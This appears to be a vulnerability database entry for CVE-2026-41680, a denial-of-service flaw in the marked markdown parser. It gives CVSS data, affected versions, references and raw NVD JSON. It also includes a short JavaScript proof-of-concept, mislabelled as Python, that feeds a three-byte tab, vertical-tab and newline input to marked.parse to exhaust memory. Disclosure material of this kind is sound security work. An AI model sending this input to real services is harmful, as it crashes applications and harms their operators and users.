CVE-2026-41680

Description

Marked is a markdown parser and compiler. From 18.0.0 to 18.0.1, a critical Denial of Service (DoS) vulnerability exists in marked. By providing a specific 3-byte input sequence a tab, a vertical tab, and a newline (\x09\x0b\n)—an unauthenticated attacker can trigger an infinite recursion loop during parsing. This leads to unbounded memory allocation, causing the host Node.js application to crash via Memory Exhaustion (OOM). This vulnerability is fixed in 18.0.2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:marked_project:marked:*:*:*:*:*:node.js:*:* - VULNERABLE

Marked 18.0.0

Marked 18.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-41680
// Vulnerable versions: marked 18.0.0 - 18.0.1
// Fixed in: 18.0.2

const marked = require('marked');

// The specific 3-byte sequence: Tab (\x09), Vertical Tab (\x0b), Newline (\n)
const maliciousInput = "\x09\x0b\n";

console.log("Testing with vulnerable version...");
try {
    marked.parse(maliciousInput);
    // This will trigger infinite recursion and eventually OOM crash
} catch (e) {
    console.error("Caught exception:", e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41680
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41680
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41680/
[4] VulDB https://vuldb.com/cve/CVE-2026-41680
[5] https://github.com/markedjs/marked/security/advisories/GHSA-6v9c-7cg6-27q7
[6] https://github.com/markedjs/marked/security/advisories/GHSA-6v9c-7cg6-27q7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41680", "sourceIdentifier": "[email protected]", "published": "2026-04-24T18:16:29.567", "lastModified": "2026-04-28T19:37:46.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Marked is a markdown parser and compiler. From 18.0.0 to 18.0.1, a critical Denial of Service (DoS) vulnerability exists in marked. By providing a specific 3-byte input sequence a tab, a vertical tab, and a newline (\\x09\\x0b\\n)—an unauthenticated attacker can trigger an infinite recursion loop during parsing. This leads to unbounded memory allocation, causing the host Node.js application to crash via Memory Exhaustion (OOM). This vulnerability is fixed in 18.0.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-674"}, {"lang": "en", "value": "CWE-835"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:marked_project:marked:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "18.0.0", "versionEndExcluding": "18.0.2", "matchCriteriaId": "DB353E43-35DC-4CBF-94F8-3060809E4DB4"}]}]}], "references": [{"url": "https://github.com/markedjs/marked/security/advisories/GHSA-6v9c-7cg6-27q7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/markedjs/marked/security/advisories/GHSA-6v9c-7cg6-27q7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}